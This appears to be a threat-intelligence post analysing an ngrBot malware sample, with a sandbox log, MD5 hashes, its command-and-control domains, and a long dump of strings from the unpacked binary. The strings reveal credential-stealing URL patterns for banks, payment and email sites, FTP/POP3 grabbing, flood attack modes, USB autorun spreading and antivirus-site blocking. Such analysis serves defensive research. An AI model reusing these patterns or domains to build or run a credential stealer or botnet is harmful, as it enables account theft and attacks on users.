rlz1lola.info(ngrBot hosted in Germany Hetzner Online Ag)

Large ngrBot server hosted in Germany
Here u have strings from 2 executable samples

30upjmrlzz.exe

Processes:
PID    ParentPID    User    Path    
--------------------------------------------------
2872    1236        C:Documents and SettingsMes documents30upjmrlzz.exe    

Ports:
Port    PID    Type    Path    
--------------------------------------------------

Explorer Dlls:
DLL Path    Company Name    File Description    
--------------------------------------------------
No changes Found            

IE Dlls:
DLL Path    Company Name    File Description    
--------------------------------------------------
No changes Found            

Loaded Drivers:
Driver File    Company Name    Description    
--------------------------------------------------

Monitored RegKeys
Registry Key    Value    
--------------------------------------------------

Kernel31 Api Log
    
--------------------------------------------------
***** Installing Hooks *****    
719f74df     RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters)    
719f80c4     RegOpenKeyExA (Protocol_Catalog9)    
719f777e     RegOpenKeyExA (00000095)    
719f764d     RegOpenKeyExA (Catalog_Entries)    
719f7cea     RegOpenKeyExA (000000000001)    
719f7cea     RegOpenKeyExA (000000000002)    
719f7cea     RegOpenKeyExA (000000000003)    
719f7cea     RegOpenKeyExA (000000000004)    
719f7cea     RegOpenKeyExA (000000000005)    
719f7cea     RegOpenKeyExA (000000000006)    
719f7cea     RegOpenKeyExA (000000000007)    
719f7cea     RegOpenKeyExA (000000000008)    
719f7cea     RegOpenKeyExA (000000000009)    
719f7cea     RegOpenKeyExA (000000000010)    
719f7cea     RegOpenKeyExA (000000000011)    
719f7cea     RegOpenKeyExA (000000000012)    
719f7cea     RegOpenKeyExA (000000000013)    
719f7cea     RegOpenKeyExA (000000000014)    
719f7cea     RegOpenKeyExA (000000000015)    
719f7cea     RegOpenKeyExA (000000000016)    
719f7cea     RegOpenKeyExA (000000000017)    
719f7cea     RegOpenKeyExA (000000000018)    
719f7cea     RegOpenKeyExA (000000000019)    
719f2623     WaitForSingleObject(77c,0)    
719f87c6     RegOpenKeyExA (NameSpace_Catalog5)    
719f777e     RegOpenKeyExA (00000039)    
719f835b     RegOpenKeyExA (Catalog_Entries)    
719f84ef     RegOpenKeyExA (000000000001)    
719f84ef     RegOpenKeyExA (000000000002)    
719f84ef     RegOpenKeyExA (000000000003)    
719f84ef     RegOpenKeyExA (000000000004)    
719f2623     WaitForSingleObject(774,0)    
719e1af2     RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters)    
719e198e     GlobalAlloc()    
7c80b72f     ExitThread()    
7d2454bb     LoadLibraryA(KERNEL32.DLL)=7c800000    
7d2454bb     LoadLibraryA(MSVBVM60.DLL )=73370000    
73371c38     GetCommandLineA()    
73372f57     CreateMutex((null))    
7d23eab5     WaitForSingleObject(764,7530)    
410de8     LoadLibraryA(KERNEL32.DLL)=7c800000    
410de8     LoadLibraryA(MSVBVM60.DLL )=73370000    
733739f4     GetCommandLineA()    
7338d1b3     LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0    
7337452c     GetVersionExA()    
7337476c     LoadLibraryA(OLEAUT32.DLL)=770e0000    
772370b9     GetVersionExA()    
7723711c     GetCommandLineA()    
7337476c     LoadLibraryA(SXS.DLL)=77210000    
774efa66     LoadLibraryA(oleaut32.dll)=770e0000    
73376792     RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors)    
77daeff6     RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors)    
770fc957     LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000    
7337a15b     LoadLibraryA(kernel32.dll)=7c800000    
406f1e     LoadLibraryA(kernel32)=7c800000    
7337a15b     LoadLibraryA(kernel32)=7c800000    
7337a15b     LoadLibraryA(USER32)=7e390000    
7345d09c     CreateFileA(C:Documents and SettingsMes documents30upjmrlzz.exe)    
7345d34f     ReadFile()    
406f1e     LoadLibraryA(NTDLL)=7c910000    
7c8165b3     WaitForSingleObject(74c,64)    
7c8191f8     LoadLibraryA(advapi32.dll)=77da0000    
7337a4c5     GetCurrentProcessId()=1236    
7337bdfa     RegOpenKeyExA (HKLMSoftwareMicrosoftWindows)    
7337be1c     RegOpenKeyExA (HTML Help)    
7337be1c     RegOpenKeyExA (Help)    
7337c9ce     WaitForSingleObject(7e4,ffffffff)    
73373657     ExitProcess()    
***** Injected Process Terminated *****    

DirwatchData
    
--------------------------------------------------
WatchDir Initilized OK    
Watching C:DOCUME~1LOCALS~1Temp    
Watching C:WINDOWS    
Watching C:Program Files    
Created: C:WINDOWSPrefetch30UPJMRLZZ.EXE-2CE4436A.pf    
Modifed: C:WINDOWSPrefetch30UPJMRLZZ.EXE-2CE4436A.pf    
Created: C:DOCUME~1zezakLOCALS~1TempJET501A.tmp    
Created: C:DOCUME~1zezakLOCALS~1TempJET2F.tmp    
Deteled: C:DOCUME~1zezakLOCALS~1TempJET2F.tmp    
Deteled: C:DOCUME~1zezakLOCALS~1TempJET501A.tmp    
File: 30upjmrlzz.exe
Size: 116236 Bytes
MD5: AB7DDF19DE425E6439160DD343B391E1
Packer: File not found C:iDEFENSESysAnalyzerpeid.exe

File Properties: CompanyName      H3 7H
FileDescription  
FileVersion      43.34.0003
InternalName     1
LegalCopyright   
OriginalFilename 
ProductName      4H37H
ProductVersion   

Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 312Kb in 0,031 seconds
Urls
--------------------------------------------------
http://%s/%s
http://%s/
http://
http://api.wipmania.com/ftp://%s:%s@%s:%d

RegKeys
--------------------------------------------------
gdatasoftware.
sunbeltsoftware.
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun

ExeRefs
--------------------------------------------------
File: 30upjmrlzz_dmp.exe_
.exe
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
%0x.exe
Internet Exploreriexplore.exe
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
.exe
lol.exe
winlogon.exe
explorer.exe
y%s%s.exe
lsass.exe

Raw Strings:
--------------------------------------------------
File: 30upjmrlzz_dmp.exe_
MD5:  20355b2f65c907536ac74b1c4cae1189
Size: 319490

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich:
.text
`.rdata
@.data
.reloc
WPVS
t1h(
_[^]
QRPWV
RPQWV
QRPSV
txVhD
uaVhD
QRPSV
SVW3
u3h0
u!h(
u3h0
PQRV
RPQW
u:WhD
u#WhD
QRPW
RPQV
RPQV
PQRV
RPQW
RSSh
vG9u
t0WSV
WVRj
WSPQR
vt9u
t0WSV
WVRj
WSPQR
gfff
WVRj
PWQR
u3h0
u!h(
u3h0
>CAL 
uGh4
=MSG t
=SDG 
>MSG u`
SVW3
SVW3
9:vP
G;9r
@W;F
Wj h
t&j,j
Wjdj
F4VP
SWf9
t-f;
t=hH
_^[]
=pzC
|04+~4
_^[]
SVWP3
QWSVR
=lzC
QPRWS
RPQS
WQRV
_^[]
_^[]
un9F
t2j h
L9_@vI
;_@r
WVPQR
SQRj
STFU
=pzC
A8j@
QWRPV
B0QPV
=4yA
PQRj
PQRj
SVWh
STFU
Vh@P@
L9^8vE
;^8r
=pzC
hpP@
STFU
PL9^(v^
9+=pzC
+=pzC
+=pzC
+=pzC
+=pzC
+=pzC
;^(r
9~0v/
;~0r
9^8v;
:+=pzC
+=pzC
+=pzC
;^8r
9^@v2
:+=pzC
+=pzC
+=pzC
;^@r
tu9]
RVWPQ
uXWV
QVWRP
u$WP
E$_^[
tpVW
uTVW
E$_^[
E$^[
E$_^[
j&hx
t}hP
QVWh
95hVA
QVht
8POST
tWWV
PQWj
RPQVW
RPQVW
WVRPS
u h(
QWRS
SVWh
SVW3
95PWA
;5PWA
95PWA
;5PWA
VWQh4
t"j V
SVWh
=USERt
=PASS
:Uu#Vh
8Pu.
=FEATt
=TYPEt
=PASVu
=STATt
=LISTu
uuhh
ucWVh
RPQh
PQRh
QRPh
QVh:
Rh~f
_[^]
_[^]
F/PQ
~(WR
T0(RW
t=VW
Qh~f
u4SV
W$RP
tmQh
RSSh
t,PVQ
O,@PQ
TSVW3
WWWWh
F4RP
LSVW3
^<^[
V4QR
vJ9^,u
;F8v
N4PQ
F4RP
F@@PR
F,BRP
u-SSV
RSWWj
8httpu1
u$8H
QRVP
RVPQ
QRVP
RVPQ
=|[A
Qh~f
SVWP
=|[A
Rh~f
hh)A
h`)A
=|[A
tlWP
=|[A
tlWP
=|[A
Rh~f
=|[A
=|[A
_^[]
h0^A
hh^A
SVWj
_^Yj
QPPPPh
h(*A
SVWj,
VjP
[@^]
Vj.P
[@^]
QRRj
RRRRf
[_^]
SVWh
h0*A
*t2:
VhH*A
Qh4*A
QSV3
j PhxWA
h`*A
Vj#S
_^[]
Wj*P
^[_]
h0+A
h$+A
SVWh
VVVV
WWVS
SVW3
RVh-
@PVj
PVh-
VhH+A
SVW3
@PVj
RVj"W
hT+A
hT+A
h|+A
ht+A
Rhh+A
QhX+A
@PVR
Wj j+V
<%u2
VVVV
SVWh
QRPu
PQRu
h ,A
QRhL]A
PhTA
Ph$]A
9Q@w
RRhh
h`]A
h`]A
h`]A
h`]A
Ph0]A
8nu8h
Rh0]A
Qh0]A
Rh0]A
Ph@]A
8nu8h
Rh@]A
Qh@]A
Rh@]A
htXA
h@XA
PVRQhT`A
PQRVh
RQPhT`A
PQRSh
8_^[
hPXA
hXA
hHXA
Rh0]A
Rh0]A
Rh@]A
Qh@]A
h|,A
h|,A
hx,A
QhP_A
Qh|_A
hx,A
h(XA
hp,A
hd,A
h8XA
8httpuM
8:uE
u>8P
PhD,A
$_^[
Qh@`A
 _^[
h@,A
h(`A
h|bA
QRPh4,A
h`XA
h4XA
hXXA
hpXA
QRPh4,A
hhXA
RPQh4,A
SVWh
8#t"
RVWP
SVWR
hx,A
hx,A
hx]A
Qhl]A
PQh0]A
u(hl
Ph$]A
QRh0]A
SVW3
h -A
t"h<-A
t"h0-A
u5h(-A
Vh$cA
VhDcA
VhdcA
VhpcA
t)h0u
SVW3
RPhD-A
QRPh
QRPh
PQRhTaA
PQhDbA
PRh(aA
QRPh
SVW3
tRh|,A
uBPh
h`]A
h -A
PWQRh
SPQh
PSRhTaA
PhTaA
PRhDbA
Ph(aA
hx,A
tqCh
s[h5
ht.A
SWhl.A
hd.A
t'j j
h<.A
h46A
SVWh
hx,A
Rh$6A
h/A
h/A
tb@Ph
Rhd/A
;< t
SVW3
Wh00A
h 0A
5$iA
50iA
5<iA
5HiA
5TiA
5`iA
5liA
95$iA
6 iA
taVW
h@0A
hD0A
Ph<_A
|Sj 3
tlSSSSSSSSSShL0A
Phd0A
tU< u
u2Wh
h(3A
hT+A
hT+A
SVWh
hT+A
h,3A
u.h,3A
SVWh
RhP3A
PVQR
h@3A
;SDG 
8SDG 
h,3A
Qhx3A
RPhl3A
QRhT3A
t!WV
_^[]
hl.A
hd.A
hl.A
hd.A
h(mA
h(5A
t!h85A
_^t)
9|:~
:~+w:~
tK@boL@
L@iBK@
%s.%s
pdef
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
block
bdns
CreateFileW
0123456789ABCDEF
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
msnint
baddr
X-MMS-IM-Format:
CAL %d %256s
msnu
Done frst
ngr->blocksize: %d
block_size: %d
NtFreeVirtualMemory
NtAllocateVirtualMemory
NtQuerySystemInformation
LdrEnumerateLoadedModules
NtQueryInformationProcess
LdrGetProcedureAddress
NtQueryVirtualMemory
LdrLoadDll
NtQueryInformationThread
LdrGetDllHandle
RtlAnsiStringToUnicodeString
.pipe%s
kernel32.dll
GetNativeSystemInfo
%s_%d
%s_0
%s-Mutex
SeDebugPrivilege
ntdll.dll
NtGetNextProcess
%s-pid
%s-comm
NtResumeThread
PONG 
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
.exe
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %255s
JOIN %255s
PRIVMSG
JOIN
%s:%d
NtSetInformationProcess
%s.%s%s
%S%s%s
HKCU
HKLM
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
popgrab
%s:%s@%s:%d
anonymous
ftp://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
Directadmin
WHCMS
cPanel
blog
%s-%s-%s
ffgrab
iegrab
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
fortinet.
virusbuster.nprotect.
gdatasoftware.
virus.
precisesecurity.
lavasoft.
heck.tc
emsisoft.
onlinemalwarescanner.
onecare.live.
f-secure.
bullguard.
clamav.
pandasecurity.
sophos.
malwarebytes.
sunbeltsoftware.
norton.
norman.
mcafee.
symantec
comodo.
avast.
avira.
avg.
bitdefender.
eset.
kaspersky.
trendmicro.
iseclab.
virscan.
garyshood.
viruschief.
jotti.
threatexpert.
novirusthanks.
virustotal.
login[password]
login[username]
*members*.iknowthatgirl*/members*
IKnowThatGirl
*youporn.*/login*
YouPorn
*members.brazzers.com*
Brazzers
clave
numeroTarjeta
*clave=*
*bcointernacional*login*
Bcointernacional
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
Dotster
loginid
*enom.com/login*
Enom
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
1and1
token
*moniker.com/*Login*
Moniker
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
Namecheap
loginname
*godaddy.com/login*
Godaddy
Password
EmailName
*Password=*
*alertpay.com/login*
Alertpay
*netflix.com/*ogin*
Netflix
*thepiratebay.org/login*
Thepiratebay
*torrentleech.org/*login*
Torrentleech
*vip-file.com/*/signin-do*
Vip-file
*pas=*
*sms4file.com/*/signin-do*
Sms4file
*letitbit.net*
Letitbit
*what.cd/login*
Whatcd
*oron.com/login*
Oron
*filesonic.com/*login*
Filesonic
*speedyshare.com/login*
Speedyshare
*pw=*
*uploaded.to/*login*
Uploaded
*uploading.com/*login*
Uploading
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
Fileserve
*hotfile.com/login*
Hotfile
*4shared.com/login*
4shared
txtpass
txtuser
*txtpass=*
*netload.in/index*
Netload
*freakshare.com/login*
Freakshare
login_pass
*login_pass=*
*mediafire.com/*login*
Mediafire
*sendspace.com/login*
Sendspace
*megaupload.*/*login*
Megaupload
*depositfiles.*/*/login*
Depositfiles
userid
*signin.ebay*SignIn
eBay
*officebanking.cl/*login.asp*
OfficeBanking
*secure.logmein.*/*logincheck*
LogMeIn
session[password]
session[username_or_email]
*password]=*
*twitter.com/sessions
Twitter
txtPassword
txtEmail
*&txtPassword=*
*.moneybookers.*/*login.pl
Moneybookers
*runescape*/*weblogin*
Runescape
*dyndns*/account*
DynDNS
*&password=*
*no-ip*/login*
NoIP
*steampowered*/login*
Steam
quick_password
quick_username
username
*hackforums.*/member.php
Hackforums
email
*facebook.*/login.php*
Facebook
*login.yahoo.*/*login*
Yahoo
passwd
login
*passwd=*
*login.live.*/*post.srf*
Live
TextfieldPassword
TextfieldEmail
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
Gmail
FLN-Password
FLN-UserName
*FLN-Password=*
*fastmail.*/mail/*
Fastmail
pass
user
*pass=*
*bigstring.*/*index.php*
BigString
screenname
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
Email
*service=youtube*
*google.*/*ServiceLoginAuth*
YouTube
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
PayPal
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Keep-Alive: 300
Connection: keep-alive
Content-Length: 42
POST
Mozilla/4.0
Connection: Close
X-a: b
.PHYSICALDRIVE0
00100
SeShutdownPrivilege
NtShutdownSystem
This binary is invalid.
Main reasons:
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!
ngrBot Error
shell32.dll
http
httpi
usbi
dnsapi.dll
DnsFlushResolverCache
http://%s/%s
http://%s/
HTTP
Host: 
POST /%1023s
{%s|%s%s}%s
n%s{%s|%s%s}%s
<br>
admin
isadmin
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
disabled
enabled
%s|%s
[Logins]: Cleared %d logins
#user
#admin
#new
removing
exiting
reconnecting
MOTD
bsod
disable
POP3 -> 
FTP -> 
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
dlds
http://
rebooting
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
SoftwareMicrosoftWindowsCurrentVersionRun
ngrBot
running
IPC_Check
shellopencommand=
shellexplorecommand=
icon=shell32.dll,7
useautoplay=1
action=Open folder to view files
shellexecute=
[autorun]
.lnk
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
/c "start %%cd%%RECYCLER%s
RECYCLER
.inf
%s%s
.%c:
%s%s
%sautorun.tmp
%sautorun.inf
%c:
gdkWindowToplevelClass
%0x.exe
comment-text
*bebo.*/c/home/ajax_post_lifestream_comment
bebo Lifestream
*bebo.*/c/profile/comment_post.json
bebo Comment
Message
*bebo.*/mail/MailCompose.jsp*
bebo Message
*friendster.*/sendmessage.php*
Friendster Message
comment
Friendster Comment
shoutout
*friendster.*/rpc.php
Friendster Shoutout
*vkontakte.ru/mail.php
vkontakte Message
*vkontakte.ru/wall.php
vkontakte Wall
message
*vkontakte.ru/api.php
vkontakte Chat
text
*twitter.*/*direct_messages/new*
Twitter Message
*twitter.*/*status*/update*
Twitter Tweet
status
*facebook.*/ajax/*MessageComposerEndpoint.php*
Facebook Message
msg_text
*facebook.*/ajax/chat/send.php*
Facebook IM
-_.!~*'()
Content-Length: 
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Reliability: 
From: 
Content-Length: %d
X-MMS-IM-Format: 
SDG %d
bmsn
%s_0x%08X
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
PR_Write
DnsQuery_W
DnsQuery_A
InternetWriteFile
HttpSendRequestW
HttpSendRequestA
GetAddrInfoW
send
CreateFileA
MoveFileW
MoveFileA
DeleteFileW
DeleteFileA
CopyFileW
CopyFileA
NtQueryDirectoryFile
NtEnumerateValueKey
%08x
OPEN
DnsFree
DnsQuery_A
DNSAPI.dll
FreeContextBuffer
InitializeSecurityContextW
FreeCredentialsHandle
DeleteSecurityContext
QueryContextAttributesW
AcquireCredentialsHandleW
EncryptMessage
DecryptMessage
InitializeSecurityContextA
ApplyControlToken
Secur32.dll
SHGetSpecialFolderPathW
SHGetFileInfoA
ShellExecuteA
SHELL32.dll
InternetCloseHandle
InternetReadFile
InternetQueryDataAvailable
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
HttpQueryInfoW
InternetQueryOptionW
WININET
.dll
PathAppendW
StrStrIA
PathAppendA
PathFindExtensionA
SHLWAPI.dll
WS2_32.dll
memset
wcsstr
strstr
wcsrchr
??3@YAXPAX@Z
atoi
sscanf
_strcmpi
printf
_snprintf
sprintf
strncpy
_memicmp
_wcsnicmp
_vsnprintf
_stricmp
strtok
strchr
_snwprintf
??2@YAPAXI@Z
_strnicmp
isxdigit
memmove
strncmp
toupper
strrchr
vsprintf
isalnum
strncat
MSVCRT.dll
lstrcpyA
MoveFileExA
lstrcmpA
WideCharToMultiByte
MoveFileExW
lstrcmpW
ExitThread
MultiByteToWideChar
GetFileAttributesA
SetFileAttributesW
GetFileAttributesW
LoadLibraryW
CloseHandle
SetFileTime
CreateFileW
GetFileTime
GetSystemTimeAsFileTime
WriteFile
GetModuleHandleW
GetLastError
ReadFile
GetTickCount
HeapAlloc
GetProcessHeap
HeapFree
lstrlenA
Sleep
WriteProcessMemory
ReadProcessMemory
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
HeapReAlloc
SetEvent
ConnectNamedPipe
CreateNamedPipeA
CreateEventA
DisconnectNamedPipe
GetOverlappedResult
WaitForMultipleObjects
CreateFileA
VirtualFreeEx
VirtualAllocEx
IsWow64Process
CreateRemoteThread
OpenProcess
WaitForSingleObject
ReleaseMutex
MapViewOfFile
OpenFileMappingA
CreateFileMappingA
InterlockedIncrement
UnmapViewOfFile
CreateMutexA
GetVersionExA
GetModuleFileNameW
InterlockedCompareExchange
CreateThread
GetWindowsDirectoryW
DeleteFileW
GetTempFileNameW
lstrcatW
lstrcpynW
DeleteFileA
SetFileAttributesA
lstrcpyW
LocalFree
LocalAlloc
lstrcpynA
SetFilePointer
DeviceIoControl
VirtualAlloc
CreateProcessW
ExitProcess
lstrcatA
GetVolumeInformationW
GetLocaleInfoA
FlushFileBuffers
CopyFileW
FindClose
FindNextFileA
FindFirstFileA
SetCurrentDirectoryA
LockFile
GetFileSize
CreateDirectoryA
GetLogicalDriveStringsA
OpenMutexA
GetModuleFileNameA
GetWindowsDirectoryA
KERNEL32.dll
MessageBoxA
wvsprintfA
wsprintfW
DefWindowProcA
DispatchMessageA
TranslateMessage
GetMessageA
RegisterDeviceNotificationA
CreateWindowExA
RegisterClassExA
USER32.dll
CryptGetHashParam
CryptDestroyHash
CryptHashData
CryptReleaseContext
CryptCreateHash
CryptAcquireContextA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegNotifyChangeKeyValue
RegSetValueExA
RegOpenKeyExA
ADVAPI32.dll
CoCreateInstance
CoInitialize
ole32.dll
 n;^
Qkkbal
i]Wb
9a&g
MGiI
wn>Jj
#.zf
+o*7
!!!!!!!!
@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@""""""""""""""""
@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x
lalorlz1.info
ROCKR
rlz1lola.info
ROCKR
rlz01jm.info
ROCKR
#ROCK
ngrBot
ELPERRO
]1.1.0.0
CUSTOMER
FvLQ49IlzIyLjj6m
msn.set
msn.int
http.set
http.int
http.inj
mdns
stats
speed
logins
slow
ssyn
stop
F4XA
gGWHXA
5hXA
ZpXA
` WA
f0WA
u{A<WA
[@WA
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread inte
rval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
httpspread
http://api.wipmania.com/
.pipe%08x_ipc
0;0G0O0V0d0n0s0
1)13181Y1e1u1|1
2C2c2
3 363M3j3u3
6(6/686J6O6T6m6
7 7(7O7V7_7
7=8T88
9#9:9W9^9f9~9
98:R:[:
;U<e<j<p<
<g=o=
>*>N>
?%?/?6?A?P?
0<0E0L0S0c0i0t0{0
2!3-4d4n4s4
5(5:5?5D5a5x5
6 6J6a6
7&7.7>7I7N7f7
1#2_2
8"8Q8X8g8q8
9':;:Y:
<'<1<H<X<x<
=%=7=D=K=Z=w=}=
>@>R>>m>
?1?<?B?j?
0g0g1
1"2Q2~2
203N3
424>4^4
8;9~9
:K:';A;_;
<4<><T<^<h<
=*=>=D=N=l=u=
>#>)>8>>>O>Y>^>p>u>
?8?L?c?u?
0$1-1H1N1_1n1
313Y3k3
414l4
515B5P5u5
676V6_6f6v6
889Y9r9
:-:G:
;#;(;2;7;<;A;F;W;
<5<?<^<
<W=l=|=
=d>o>{>
?/?U?`?p?
1P2T2X2
3?4a4h4
5A5H5|5
7U8]8f8}8
9'9-939q9
: :%:n:
;1;J;d;
<%<3<<<B<i<v<
=$=+=0===E=L=T=o=v=
=6>E>
?%?4??
0'0K0s0x0}0
091M1g1t1
3[3q3
3*494
4-575w5~5
5B6L6
6(7I7]7z7
848_9m9w9
:+:1:7:D:Q:V:e:t:
; ;,;8;L;Q;V;n;s;x;};
;5<B<]<w<
=5===B=N=S=g=l=
5"6-6B6L6Q6c6u6
7 70767=7L7R7
94:{:
'010
1.1F1^1
2(2>2P2b2t2
4K5f5
6=6K6Y6
7*7/7L7S7r7
8]8i8
9+9;9A9G9d9q9w9}9
9/:b:h:
;!;S;`;h;s;
;E<e<w<
=.=<=A=F=L=R=k=u=
>#>,>X>
?-??y?
42484T4`4f4
4X5]5|5
6-646D6Q6[6b6g6q6z6
9 9&9<9G9R9W99q9v9
9::G:M:b:j:z:
;.;6;;;B;H;S;c;k;
<+<F<T<`<
=3=E=Q=
>3>T>k>z>
?Z?r?{?
%0<0V0h0
141>1l1
3g3r3
34c4
5*585R5w5
6!6<6R6a6
7=7C7T7g7z7
8-9L9w9
9-:D:W:
;#;4;:;T;Z;
<#<(<-<2<7<P<j<w<
=)=.=K=[=`=}=
>+>I>V>[>s>z>
?*?H?T?a?g?u?
0,0J0Z0g0l0v0
1%101=1C1I1W1s1y1
2'212<2J2_2
3"3@3P3V3
4)4J4h4x4
535Q5s5
6!6.656D6S6`6m6z6
7?7E7
7'8,818[8w8
8.9K9V9s9
:':,:D:T:Y:r:
;2;7;W;r;w;|;
<$<5<<<F<N<b<
=(=I=O=Z=r=|=
>V>g>|>
>#?h?
0-070D0x0
0@1G1
132D2Z2p2
3*343=3R3^3
3-434=4F5P5]5
536N6[6
637B7U7d7q7
818>8T8]8|8
9T9`9o9u9z9
:!:,:3:;:A:O:Y:f:l:r:
;(;3;9;?;Q;];c;i;{;
<&<3<8<G<T<Z<`<n<
<,=3=A=G=W=w=|=
>@>E>>
>W?`?
010C0H0M0a0f0k0
1 1$1<1M1U1
1-2O2z2
3I3Z3o3z3
4"4'4<4U4_4t4z4
575=5r5|5
6(6=6P6m6z6
7 767<7~7
8A8F8Y8c8j8
999C9
:%:,:3:=:F:e:
;+;=;D;X;];c;i;n;
;.<4<;<@<e<p<w<
="=*=0=;=F=O=Z=b=g=v={=
=7>N>W>]>
>&?7?~?
40;0A0Q0a0
2)2A2[2
2T3]3f5
6F6Y6t6
7I7Y7_7e7k7q7w7}7
8*808;8~8
9 9O9X9^9
9$:0:Q:
:&;2;8;F;
<"<2<=<Q<W<i<
=$=*=4=:=E=K=S=e=
>;>I>
?!?F?M?W?
1$1<1I1[1g1
2%2>2V2a2t2|2
373E3M3a3l3
3@4N4U4
5/565<5R5k5
666i6
7.7M7
8,818M8[8`8
8?9R9
:#:4:9:?:E:P:{:
;#;B;U;[;b;r;
<!<o<
=$=;=C=N=S=X=i=n=s=}=
>">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|>
?B?H?N?T?Z?`?f?l?r?x?~?
4 4$4(4,4044484<4@4D4H4L4P4T4X66`6h6l6p6t6x6|6
7D7L7X77`7d7h7l7p7t7
9(949@9L9X9d9p9|9
:$:0:<:H:T:`:l:x:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;;`;d;h;
4 4$4(4,4044484<4@4D4H4L4P4T4X44`4d4h4l4p4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X55`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X66`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X77`7d7h7l7p7t7x7|7
